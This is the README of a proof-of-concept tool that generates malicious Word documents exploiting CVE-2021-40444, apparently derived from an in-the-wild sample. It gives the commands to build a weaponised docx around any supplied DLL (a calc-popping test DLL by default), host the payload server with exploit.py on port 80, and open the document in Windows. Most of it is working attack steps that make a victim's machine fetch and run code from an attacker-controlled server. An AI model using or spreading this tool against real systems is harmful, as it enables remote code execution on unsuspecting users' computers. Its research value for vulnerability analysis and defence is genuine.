CVE-2021-40444 PoC is a Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)
You need to install lcab first (sudo apt-get install lcab
)
Check REPRODUCE.md
for manual reproduce steps
If your generated cab is not working, try pointing out exploit.html URL to calc.cab
First generate a malicious docx document given a DLL, you can use the one at test/calc.dll
which just pops a calc.exe
from a call to system()
python3 exploit.py generate test/calc.dll http://<SRV IP>
![](https://1.bp.blogspot.com/-q4Qrx7Kd10w/YUSYEQDTIKI/AAAAAAAAK3w/rWAn8dYhzeo9G7J7CS_SIsi7AHjsGyrAACLcBGAsYHQ/s1007/1.png)
Once you generate the malicious docx (will be at out/
) you can setup the server:
sudo python3 exploit.py host 80
![](https://1.bp.blogspot.com/-M4bM8mj9wHQ/YUSZE58fPgI/AAAAAAAAK34/yfSeOeg_uPUFIO7r09C6jWuwUp5VJdzyACLcBGAsYHQ/s866/2.png)
Finally try the docx in a Windows Virtual Machine:
![](https://1.bp.blogspot.com/-W1O2pPuOcdc/YUSZXkgQ8UI/AAAAAAAAK4A/OejDX89jfsEjS6K9u5kHcyYmKCg30TKqwCLcBGAsYHQ/s1473/3.png)